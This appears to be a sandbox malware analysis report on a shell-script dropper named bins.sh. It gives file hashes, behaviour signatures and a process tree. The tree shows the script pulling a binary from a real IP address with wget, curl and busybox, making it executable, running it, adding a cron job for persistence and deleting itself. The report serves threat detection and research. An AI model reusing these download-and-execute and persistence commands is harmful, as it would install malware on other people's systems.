Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    26/11/2024, 17:01

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    6ba8a8748f75571967562756ca21b71b

  • SHA1

    34882ed8e6e9809e322519be0ca0dbeb795757cd

  • SHA256

    5afdb5bbac7f5d3c2277c891e250c851aaf1bcb7b5ae535c0b5579caee3a545e

  • SHA512

    8a0e52f5a8a86784b50d71711349db2df0c00d16d9853a7a85a1b4a8511e710a50d5c250aa068b021ca81caafc7a2dff94f1ce4fc9a907f167e429b7185cb138

  • SSDEEP

    96:TlKrZDjN2CwWm8WaiqKtIaBEgCbjpEF18XPNWmslWaiqKt0fZDjN2CUnaRQgF1KE:5Kr4Wm8WaidtIasJXlWmaWaidtSMU

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:655
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:657
        • /usr/bin/wget
          wget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Writes file to tmp directory
          PID:659
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:686
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Writes file to tmp directory
          PID:701
        • /bin/chmod
          chmod 777 cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • File and Directory Permissions Modification
          PID:714
        • /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          ./cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:715
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:717
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:719
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:721
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:722
              • /bin/rm
                rm cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
                2⤵
                  PID:738
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS
                  2⤵
                    PID:742

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY

                  Filesize

                  177KB

                  MD5

                  786d75a158fe731feca3880f436082c0

                  SHA1

                  79ea2734e43d00cdeabed5586b2c1994d02aef3e

                  SHA256

                  5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                  SHA512

                  7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                • /var/spool/cron/crontabs/tmp.0C0p0m

                  Filesize

                  210B

                  MD5

                  0319c7021f7a9f152357df696635d67a

                  SHA1

                  788b20d2211f73bb2420706a691c1156c0489fe7

                  SHA256

                  44043d7ae359508ca049c79812e5d1077d7dd27721a049b9da285156cf92f9ca

                  SHA512

                  dda14e4ae1f31903fbec37cf13acc6a1c02573400b05ced505b4b197ccc5466e4bb5f0a0fc8061595e14fdedf87c0d6905b6d35a15e81e3767109b15f2e055fe